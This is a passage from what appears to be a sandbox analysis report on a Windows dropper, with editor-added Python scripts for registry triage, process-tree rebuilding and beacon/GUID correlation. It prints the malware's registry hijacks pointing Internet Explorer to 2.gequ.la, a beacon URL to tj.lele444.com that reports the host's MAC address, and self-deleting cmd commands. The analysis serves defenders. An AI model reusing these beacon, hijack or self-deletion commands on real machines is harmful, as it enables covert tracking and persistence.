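Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{215F3575-A7CB-43ad-A578-270D68728284}\Shell\??(R)\Command\ = "Rundll32.exe Shell32.dll,Control_RunDLL Inetcpl.cpl" zm.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{215F3575-A7CB-43ad-A578-270D68728284}\ShellFolder\Attributes = "10" zm.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D68728281}\ = "Internet Explorer" zm.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D68728281}\DefaultIcon\ = "c:\\windows\\cy.ico" zm.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D68728281}\Shell\Open\Command\ = "C:\\Program Files\\Internet Explorer\\iexplore.exe http://2.gequ.la" zm.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D68728281}\Shell\??(R)\Command\ = "Rundll32.exe Shell32.dll,Control_RunDLL Inetcpl.cpl" zm.exe
"""

SET_RE = re.compile(r'^Set value \((\w+)\) (.+?) = "(.*)" (\S+)$')
CLSID_RE = re.compile(r"\{[0-9A-Fa-f-]+\}")


def parse_rows(text):
    """Return (key, kind, value, process) per row; kind is 'key' for 'Key created' rows."""
    rows = []
    for line in text.strip().splitlines():
        m = SET_RE.match(line)
        if m:
            kind, key, value, proc = m.groups()
            rows.append((key, kind, value.replace("\\\\", "\\"), proc))  # undo the sandbox's escaping
        elif line.startswith("Key created "):
            key, _, proc = line[len("Key created "):].rpartition(" ")
            rows.append((key, "key", None, proc))
    return rows


def repair_ansi_label(label):
    """Inference (see lead-in): the verb label was GBK bytes written via the ANSI API and
    stored on a cp1252 host; the same bytes read as GBK give the Chinese label."""
    try:
        return label.encode("cp1252").decode("gbk")
    except UnicodeError:
        return label


def percent_readings(token):
    """Two heuristic renderings of a %-laced argument; neither is confirmed by the report."""
    return token.replace("%", ""), token.replace("%1", "").replace("%", "")


def triage(rows):
    """Group rows by CLSID and collect name, icon, verbs, URLs and obfuscated arguments."""
    found = defaultdict(lambda: {"name": None, "icon": None, "attributes": None, "verbs": {},
                                 "procs": set(), "urls": [], "percent_readings": []})
    for key, kind, value, proc in rows:
        m = CLSID_RE.search(key)
        if not m:
            continue
        entry = found[m.group()]
        entry["procs"].add(proc)
        if kind == "key":
            continue
        parts = [p for p in key[m.end():].split("\\") if p]   # path below the CLSID key
        if not parts:
            entry["name"] = value                                # (Default) value of the CLSID key
        elif parts == ["DefaultIcon"]:
            entry["icon"] = value
        elif parts == ["ShellFolder", "Attributes"]:
            entry["attributes"] = value
        elif len(parts) == 3 and parts[0] == "Shell" and parts[2] == "Command":
            entry["verbs"][repair_ansi_label(parts[1])] = value
            entry["urls"] += re.findall(r"https?://\S+", value)
            entry["percent_readings"] += [percent_readings(t) for t in value.split()
                                          if "%" in t and t != "%1"]
    return dict(found)


def hunt_keys(found):
    """Registry paths to search on other hosts (32-bit droppers, hence WOW6432Node)."""
    return [rf"HKLM\SOFTWARE\Classes\WOW6432Node\CLSID\{clsid}" for clsid in sorted(found)]


if __name__ == "__main__":
    for clsid, e in triage(parse_rows(REG_ROWS)).items():
        print(clsid, e["name"], e["icon"], e["verbs"], e["urls"], e["percent_readings"])
```

On a zh-CN victim the verb key would be stored as 属性(&D), so a hunt has to search for both spellings; the CLSID paths returned by hunt_keys do not depend on the code page.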
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
Processes: IEXPLORE.EXE
pid | process
4984 | IEXPLORE.EXE
-
Suspicious use of SetWindowsHookEx 12 IoCs
Processes: si.exe, q1222211.exe, TAEKMAN.exe, zm.exe, tj.exe, Source.exe, IEXPLORE.EXE, IEXPLORE.EXE
pid | process
3208 | si.exe
3932 | q1222211.exe
1052 | TAEKMAN.exe
4728 | zm.exe
3628 | tj.exe
1060 | Source.exe
4984 | IEXPLORE.EXE
4984 | IEXPLORE.EXE
1336 | IEXPLORE.EXE
1336 | IEXPLORE.EXE
1336 | IEXPLORE.EXE
1336 | IEXPLORE.EXE
-
Suspicious use of WriteProcessMemory 44 IoCs
Processes: 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe, 5.exe, ie.exe, q1222211.exe, zm.exe, tj.exe, IEXPLORE.EXE, cmd.exe
description | pid | process | target process (the page repeats each row once per write; the count is given in the last column, 44 rows in total)
PID 3048 wrote to memory of 4264 | 3048 | 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe | 5.exe | 3 rows
PID 3048 wrote to memory of 1924 | 3048 | 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe | ie.exe | 3 rows
PID 3048 wrote to memory of 3128 | 3048 | 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe | 146.exe | 3 rows
PID 4264 wrote to memory of 3932 | 4264 | 5.exe | q1222211.exe | 3 rows
PID 3048 wrote to memory of 3208 | 3048 | 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe | si.exe | 3 rows
PID 1924 wrote to memory of 1052 | 1924 | ie.exe | TAEKMAN.exe | 3 rows
PID 3048 wrote to memory of 4728 | 3048 | 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe | zm.exe | 3 rows
PID 3048 wrote to memory of 3628 | 3048 | 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe | tj.exe | 3 rows
PID 3932 wrote to memory of 1060 | 3932 | q1222211.exe | Source.exe | 3 rows
PID 1924 wrote to memory of 3200 | 1924 | ie.exe | cmd.exe | 3 rows
PID 4728 wrote to memory of 2608 | 4728 | zm.exe | cmd.exe | 3 rows
PID 3628 wrote to memory of 4984 | 3628 | tj.exe | IEXPLORE.EXE | 2 rows
PID 4984 wrote to memory of 1336 | 4984 | IEXPLORE.EXE | IEXPLORE.EXE | 3 rows
PID 3628 wrote to memory of 4896 | 3628 | tj.exe | cmd.exe | 3 rows
PID 4896 wrote to memory of 2428 | 4896 | cmd.exe | PING.EXE | 3 rows
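The WriteProcessMemory rows are the raw material from which the process tree in the next section is built: each "PID A wrote to memory of B" record names a parent and the child it just created. The script below, an added example by the editor and not part of the sandbox report, parses the 44 rows exactly as the page flattens them, deduplicates the repeated writes while keeping their counts, finds the root (the one PID nobody wrote to) and renders the tree, so the same reconstruction can be done for any report whose tree view is unavailable.

```python
"""Rebuild the process tree from the flattened WriteProcessMemory rows of the report."""
import re
from collections import Counter

# Constructed input: the 44 rows from the table above, joined into one run-on string the way
# the page prints them. The sandbox logs three writes per child for most creations and two
# for tj.exe -> IEXPLORE.EXE; the counts are kept, not interpreted.
WPM_ROWS = (
    "PID 3048 wrote to memory of 4264 3048 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe 5.exe "
    "PID 3048 wrote to memory of 4264 3048 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe 5.exe "
    "PID 3048 wrote to memory of 4264 3048 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe 5.exe "
    "PID 3048 wrote to memory of 1924 3048 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe ie.exe "
    "PID 3048 wrote to memory of 1924 3048 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe ie.exe "
    "PID 3048 wrote to memory of 1924 3048 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe ie.exe "
    "PID 3048 wrote to memory of 3128 3048 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe 146.exe "
    "PID 3048 wrote to memory of 3128 3048 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe 146.exe "
    "PID 3048 wrote to memory of 3128 3048 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe 146.exe "
    "PID 4264 wrote to memory of 3932 4264 5.exe q1222211.exe "
    "PID 4264 wrote to memory of 3932 4264 5.exe q1222211.exe "
    "PID 4264 wrote to memory of 3932 4264 5.exe q1222211.exe "
    "PID 3048 wrote to memory of 3208 3048 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe si.exe "
    "PID 3048 wrote to memory of 3208 3048 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe si.exe "
    "PID 3048 wrote to memory of 3208 3048 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe si.exe "
    "PID 1924 wrote to memory of 1052 1924 ie.exe TAEKMAN.exe "
    "PID 1924 wrote to memory of 1052 1924 ie.exe TAEKMAN.exe "
    "PID 1924 wrote to memory of 1052 1924 ie.exe TAEKMAN.exe "
    "PID 3048 wrote to memory of 4728 3048 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe zm.exe "
    "PID 3048 wrote to memory of 4728 3048 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe zm.exe "
    "PID 3048 wrote to memory of 4728 3048 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe zm.exe "
    "PID 3048 wrote to memory of 3628 3048 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe tj.exe "
    "PID 3048 wrote to memory of 3628 3048 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe tj.exe "
    "PID 3048 wrote to memory of 3628 3048 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe tj.exe "
    "PID 3932 wrote to memory of 1060 3932 q1222211.exe Source.exe "
    "PID 3932 wrote to memory of 1060 3932 q1222211.exe Source.exe "
    "PID 3932 wrote to memory of 1060 3932 q1222211.exe Source.exe "
    "PID 1924 wrote to memory of 3200 1924 ie.exe cmd.exe "
    "PID 1924 wrote to memory of 3200 1924 ie.exe cmd.exe "
    "PID 1924 wrote to memory of 3200 1924 ie.exe cmd.exe "
    "PID 4728 wrote to memory of 2608 4728 zm.exe cmd.exe "
    "PID 4728 wrote to memory of 2608 4728 zm.exe cmd.exe "
    "PID 4728 wrote to memory of 2608 4728 zm.exe cmd.exe "
    "PID 3628 wrote to memory of 4984 3628 tj.exe IEXPLORE.EXE "
    "PID 3628 wrote to memory of 4984 3628 tj.exe IEXPLORE.EXE "
    "PID 4984 wrote to memory of 1336 4984 IEXPLORE.EXE IEXPLORE.EXE "
    "PID 4984 wrote to memory of 1336 4984 IEXPLORE.EXE IEXPLORE.EXE "
    "PID 4984 wrote to memory of 1336 4984 IEXPLORE.EXE IEXPLORE.EXE "
    "PID 3628 wrote to memory of 4896 3628 tj.exe cmd.exe "
    "PID 3628 wrote to memory of 4896 3628 tj.exe cmd.exe "
    "PID 3628 wrote to memory of 4896 3628 tj.exe cmd.exe "
    "PID 4896 wrote to memory of 2428 4896 cmd.exe PING.EXE "
    "PID 4896 wrote to memory of 2428 4896 cmd.exe PING.EXE "
    "PID 4896 wrote to memory of 2428 4896 cmd.exe PING.EXE"
)

# description, pid, process, target process; the pid column repeats the writer's PID
ROW_RE = re.compile(r"PID (\d+) wrote to memory of (\d+) (\d+) (\S+) (\S+)")


def parse_wpm_rows(text):
    """Return (parent_pid, child_pid, parent_name, child_name) per row, in page order."""
    return [(int(a), int(b), name, target) for a, b, _pid, name, target in ROW_RE.findall(text)]


def build_tree(records):
    """Map every PID to a name, count writes per (parent, child) and keep first-seen child order."""
    names, counts, children = {}, Counter(), {}
    for parent, child, pname, cname in records:
        names[parent], names[child] = pname, cname
        counts[(parent, child)] += 1
        kids = children.setdefault(parent, [])
        if child not in kids:
            kids.append(child)
    return children, names, counts


def find_roots(children, names):
    """PIDs nobody wrote into: the submitted sample should be the only one."""
    spawned = {c for kids in children.values() for c in kids}
    return sorted(p for p in names if p not in spawned)


def render_tree(children, names, counts, root, depth=0, parent=None):
    """Depth-first listing, one line per process, annotated with the writes from its parent."""
    note = f"  ({counts[(parent, root)]} writes)" if parent is not None else ""
    lines = [f"{'  ' * depth}{root} {names[root]}{note}"]
    for child in children.get(root, []):
        lines += render_tree(children, names, counts, child, depth + 1, root)
    return lines


if __name__ == "__main__":
    children, names, counts = build_tree(parse_wpm_rows(WPM_ROWS))
    for root in find_roots(children, names):
        print("\n".join(render_tree(children, names, counts, root)))
```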
Processes
-
Level 1: C:\Users\Admin\AppData\Local\Temp\6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe"
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID: 3048
  Level 2: C:\Users\Admin\Local Settings\Temp\5.exe
    Command line: "C:\Users\Admin\Local Settings\Temp\5.exe"
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID: 4264
    Level 3: C:\Windows\temp\syccom\q1222211.exe
      Command line: "C:\Windows\temp\syccom\q1222211.exe"
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory
      PID: 3932
      Level 4: C:\Windows\temp\syccom\Source.exe
        Command line: C:\Windows\temp\syccom\Source.exe
        - Executes dropped EXE
        - System Location Discovery: System Language Discovery
        - Suspicious use of SetWindowsHookEx
        PID: 1060
  Level 2: C:\Users\Admin\Local Settings\Temp\ie.exe
    Command line: "C:\Users\Admin\Local Settings\Temp\ie.exe"
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID: 1924
    Level 3: C:\Windows\TAEKMAN.exe
      Command line: "C:\Windows\TAEKMAN.exe"
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      - Suspicious use of SetWindowsHookEx
      PID: 1052
    Level 3: C:\Windows\SysWOW64\cmd.exe
      Command line: cmd /c del "C:\Users\Admin\Local Settings\Temp\ie.exe"
      - System Location Discovery: System Language Discovery
      PID: 3200
  Level 2: C:\Users\Admin\Local Settings\Temp\146.exe
    Command line: "C:\Users\Admin\Local Settings\Temp\146.exe"
    - Executes dropped EXE
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    PID: 3128
  Level 2: C:\Users\Admin\Local Settings\Temp\si.exe
    Command line: "C:\Users\Admin\Local Settings\Temp\si.exe"
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID: 3208
  Level 2: C:\Users\Admin\Local Settings\Temp\zm.exe
    Command line: "C:\Users\Admin\Local Settings\Temp\zm.exe"
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID: 4728
    Level 3: C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Local Settings\Temp\kill.bat""
      - System Location Discovery: System Language Discovery
      PID: 2608
  Level 2: C:\Users\Admin\Local Settings\Temp\tj.exe
    Command line: "C:\Users\Admin\Local Settings\Temp\tj.exe"
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID: 3628
    Level 3: C:\Program Files\Internet Explorer\IEXPLORE.EXE
      Command line: "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://tj.lele444.com/tongji/g.asp?mac=E2:62:22:BA:F6:A3&id=admin
      - Modifies Internet Explorer settings
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory
      PID: 4984
      Level 4: C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        Command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4984 CREDAT:17410 /prefetch:2
        - System Location Discovery: System Language Discovery
        - Modifies Internet Explorer settings
        - Suspicious use of SetWindowsHookEx
        PID: 1336
    Level 3: C:\Windows\SysWOW64\cmd.exe
      Command line: cmd /c ping 127.0.0.1 -n 3 && del "C:\Users\Admin\Local Settings\Temp\tj.exe"
      - System Location Discovery: System Language Discovery
      - System Network Configuration Discovery: Internet Connection Discovery
      - Suspicious use of WriteProcessMemory
      PID: 4896
      Level 4: C:\Windows\SysWOW64\PING.EXE
        Command line: ping 127.0.0.1 -n 3
        - System Location Discovery: System Language Discovery
        - System Network Configuration Discovery: Internet Connection Discovery
        - Runs ping.exe
        PID: 2428
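The only outbound request the tree records is tj.exe starting IEXPLORE.EXE on http://tj.lele444.com/tongji/g.asp?mac=E2:62:22:BA:F6:A3&id=admin, a beacon that reports the host's MAC address. The same MAC is embedded in the Recovery\AdminActive GUID that IE wrote (see the Internet Explorer settings table): {692A206C-911E-11EF-B319-E26222BAF6A3} is a version 1 UUID, whose last 48 bits are the generating adapter's MAC and whose first 60 bits are a 100 ns timestamp counted from 15 October 1582. The script below is an added example by the editor, not part of the sandbox report; it takes the two strings from the report, pulls the beacon parameters out of the URL, decodes the GUID and checks that the two MACs agree and that the GUID's timestamp falls in the run.

```python
"""Correlate the tj.exe beacon URL with the IE Recovery GUID written in the same run."""
import uuid
from datetime import datetime, timedelta, timezone
from urllib.parse import parse_qs, urlsplit

# Both inputs are copied from the report above (constructed input for this example).
BEACON_CMDLINE = ('"C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE" '
                  "http://tj.lele444.com/tongji/g.asp?mac=E2:62:22:BA:F6:A3&id=admin")
RECOVERY_KEY = (r"\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft"
                r"\Internet Explorer\Recovery\AdminActive\{692A206C-911E-11EF-B319-E26222BAF6A3}")

# RFC 4122 version 1 timestamps are 100 ns ticks since the Gregorian reform date.
GREGORIAN_EPOCH = datetime(1582, 10, 15, tzinfo=timezone.utc)


def beacon_url(cmdline):
    """First http(s) token of the command line; IE is started with the URL as its only argument."""
    return next(tok for tok in cmdline.split() if tok.lower().startswith(("http://", "https://")))


def beacon_params(url):
    """Query string as a flat dict (first value per key)."""
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}


def guid_from_key(key):
    """Last path component of the registry key, braces removed, as a uuid.UUID."""
    return uuid.UUID(key.rsplit("\\", 1)[1].strip("{}"))


def mac_from_uuid1(u):
    """The node field of a version 1 UUID, formatted as a colon-separated MAC."""
    raw = f"{u.node:012X}"
    return ":".join(raw[i:i + 2] for i in range(0, 12, 2))


def uuid1_created(u):
    """Creation time of a version 1 UUID, in UTC."""
    return GREGORIAN_EPOCH + timedelta(microseconds=u.time // 10)


def is_locally_administered(mac):
    """Bit 1 of the first octet set means the address was assigned by software, not by a vendor."""
    return bool(int(mac.split(":")[0], 16) & 0x02)


def correlate(cmdline, key):
    url = beacon_url(cmdline)
    params = beacon_params(url)
    u = guid_from_key(key)
    is_v1 = u.version == 1
    guid_mac = mac_from_uuid1(u) if is_v1 else None
    beacon_mac = params.get("mac")
    return {
        "host": urlsplit(url).hostname,
        "params": params,
        "beacon_mac": beacon_mac,
        "guid_version": u.version,
        "guid_mac": guid_mac,
        "match": guid_mac is not None and beacon_mac is not None and guid_mac == beacon_mac.upper(),
        "guid_created_utc": uuid1_created(u) if is_v1 else None,
        "locally_administered": is_locally_administered(beacon_mac) if beacon_mac else None,
    }


if __name__ == "__main__":
    for k, v in correlate(BEACON_CMDLINE, RECOVERY_KEY).items():
        print(f"{k}: {v}")
```

The decoded GUID timestamp lands on 23 October 2024 at about 09:08 UTC, the same minute the report lists as the submission time, which is what one expects when IE is started a few seconds into the run. The MAC's first octet (E2) has the locally-administered bit set, consistent with a sandbox-assigned adapter; on a real victim the beacon would carry the vendor-assigned address, so the mac= parameter is worth matching against DHCP and switch logs when this URL appears in proxy data.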
Network
MITRE ATT&CK Enterprise v15
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
Filesize: 471B
MD5: 7397bc535c3fdecb6c04cae2713a2439
SHA1: 4b147507f647ff16c8c98d402d9879f265e6e934
SHA256: 1d9f5b2f5e87877344701a5ed6e9a9ab49ad47c72183893cf5a3dfc89ffaf075
SHA512: 4fc311a683e25d5e1336aa382101f6eed214928a2bfa14a6bd3a149b44e089dd241dd06c755a5c1d8c8b2563bd04e0254ce26ecc306e25d7ff22223f61f50245
(The two CryptnetUrlCache entries are written by CryptoAPI's URL cache during certificate and revocation fetches, a side effect of starting Internet Explorer rather than a download made by the sample.)
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
Filesize: 404B
MD5: e39e6121e7d4c8a77f6acc9354f604d6
SHA1: 27a3766530fb04cc89ee1deb19e9779a62a189dd
SHA256: e45367895c0a0a2258d37a2c9c471c266f9980cf155cce21647b1fe6a8190a0c
SHA512: 09a8822d237bd0243b61cd0b5ab451461ac07fed24ccfc77fb850027da64be223899dc26894c93cb4ba666c531e7cecea887fa66a2781f4d709fde63cc703b12
-
Filesize: 15KB
MD5: 1a545d0052b581fbb2ab4c52133846bc
SHA1: 62f3266a9b9925cd6d98658b92adec673cbe3dd3
SHA256: 557472aeaebf4c1c800b9df14c190f66d62cbabb011300dbedde2dcddd27a6c1
SHA512: bd326d111589d87cd6d019378ec725ac9ac7ad4c36f22453941f7d52f90b747ede4783a83dfff6cae1b3bb46690ad49cffa77f2afda019b22863ac485b406e8d
-
Filesize: 17KB
MD5: 5a34cb996293fde2cb7a4ac89587393a
SHA1: 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256: c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512: e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee
-
Filesize: 218KB
MD5: ba926a2e63110eeef92f9d4fa6ee8366
SHA1: 5b9c4f5099c69a95a63eef8273d947178f9da48b
SHA256: 56c3d5d9ba29166a712c013ecb0edc4c94847323ca57a29d40492993f5efb2a0
SHA512: fbc7afa1b11672792aab61d2d419fc8d6206d84e9f5328d4da8a0028377f0095767bf7c54eb7246989401a8d23768c937516611fae512b285453320e859d8c4f
-
Filesize: 183KB
MD5: 5587b9705faea003ae2695bf0999d16c
SHA1: 56dad20d4f75bc3fbd2f248e7f177f47a69e477f
SHA256: f43cf1d0bbee74af7208439f55f0516550ca5d6992f39fa77fb0ba5eace212e9
SHA512: 36b2f58578c0e7498e8c685926dd0e01503659e46cf8183f8cd38a4b265472f57dbe287918c39153015f2e2d47640226404aa8ad0b296cbcf1f6ba99b5454704
-
Filesize: 70KB
MD5: b99fb8dcd8c910814bbea8518e0400f4
SHA1: 5f5d5a36c0fe18ae7e6d2fe10aeb125ec37bcb33
SHA256: 2b285c7d5889795efab9e1371cf1fcbf2d9722a88bc1ac95edfa4d798aecaddb
SHA512: 2a7ea71f57e7c4fad413467460a966dda4e45ed5271a8a777437d25e318274a8a84ad25dbd8246fe70c1e11affb05c48e69d8e1c4e0ba8a64ad66631f373c452
-
Filesize: 49KB
MD5: f390eee8d1e2093894c5b149ea63bc52
SHA1: 7ef1ac5ba347d8ffba26e323db1a90d66676f2e0
SHA256: 3e01b95f3b5c49c03297407d186ad69377a5a2f643fb7dfa87bb0b29bfea292f
SHA512: e5a170f8875497d7082db68008eb5bdc9c3adf9efeabcfc690a3af1d60ae86f6bd114cc8e0d9c5c2ce54ae806daed38442d262344bd51aea422635191f612a61
-
Filesize: 7KB
MD5: c943f490b04e6fbd8bc9de3f4e5d2830
SHA1: ca01699a582f189c5c40cc5cd7871fc025f8d775
SHA256: 6ef783826b33fea4669acd6e7248c7883537562f2f140e29a96c3abe2f6455fa
SHA512: 5aa29547762f71fa5bc37cd8332b48b4b4f76e7bf1c85fb2fa6aac79e404866cd2b9dde33da3c84da77b986bced6eeb5a1042b85ee4c1e8199867fa95482592b
-
Filesize: 60KB
MD5: 542480c776a3deddfae1a9709bdcd540
SHA1: 9882500938452ad2736e7144a1483568a1d31c59
SHA256: 4b28b76821044eddf98234ef1825f0d7b15c257c6f1c589734ab5dfc9a5509a1
SHA512: d9738dfda4a547f5331c72db02f27c0e28bc8df458e7672a8147013f161574c1382ace0d484a88748db2c0036fe5f4c0daa6c0a58eed528ce80f939a05e82c62
-
Filesize: 94B
MD5: f7d49f5167b6d829a54146ef3287abf3
SHA1: 828c178af49b0a144a036530cd6199ef146e37f8
SHA256: 71d170b56b07c7a47e65fdddd24dc17e40f8fc144e2fa4fa6f303388bdc7513c
SHA512: 3a1e14f86a7427234b2e97a3e24a0bbd81a83a008d5b190e8a661e1d06c5037da3867cae2a541e4c4c28e7f740bbbf5f520f3d6feb29a8a240208ab2fb097df2
-
Filesize: 132B
MD5: 1e7b4e1c312b95d33757152ef2b858dd
SHA1: 3f8683cc9bd354fff509548bf3519c8edbc02f55
SHA256: ff0d4134f546d7e50f252fea80e24570cf110e597ef21059611eb8271dadc9a3
SHA512: 506e3e1fd991286238b3df1f58233fffe5950b10464ea54da2b18261adaa810c5f934f2fabdeea10fb69b168bf5e332917edece621d3a92b97f16a2c8f8070b4
-
Filesize: 8KB
MD5: f445fc920b03a0d552dd6aed23b64a4e
SHA1: abd84d31130047efcbc1fe81b771e7f29f67eec0
SHA256: fde2e50cf160786220a1689e374cd36fccb1e398349971609f5113ab8092388b
SHA512: b7a879233469c190f640886032cacec44edea5ebdd60850199d7131320b3b0e189195036a91a2aa3452b4e4295dfac7b20f5d67d6117dd4cc939f545e2879466
-
Filesize: 20KB
MD5: 294b280708d5fe53acdf7899e33a38a6
SHA1: c906e73493e38bda6733dcf11bcf404836e99a4f
SHA256: 6f975bccfb0513dcc702be4e6e5977c2cd1fc4879d6f89fa2731182e3739bd39
SHA512: b067935b17a286336cdf70b37569cc737a7adab83b8b33f28c1d759eee34ec6a96689a4fa68adb6bb53a2b96d5c1075df19763def09c12d6d9c5f21618857cf1
-
Filesize: 96KB
MD5: 42c3027137bf43d8eb32805817ffca5d
SHA1: 545bc4a38caae604753d77af167e2dd8e3e5b76a
SHA256: f7ad3492db50a528c184d0e2b5ca8b521060deefd6a90d821d9e24010d52fea7
SHA512: 5f3156fed967707c8f2b3da6ea81cf7ec5952deb285d6bac7a14cae8247bdf2b4e96edce32bea6d5b3b4f7e86d1b5be05f2c6eb46fd56f180826d7f1177e2d15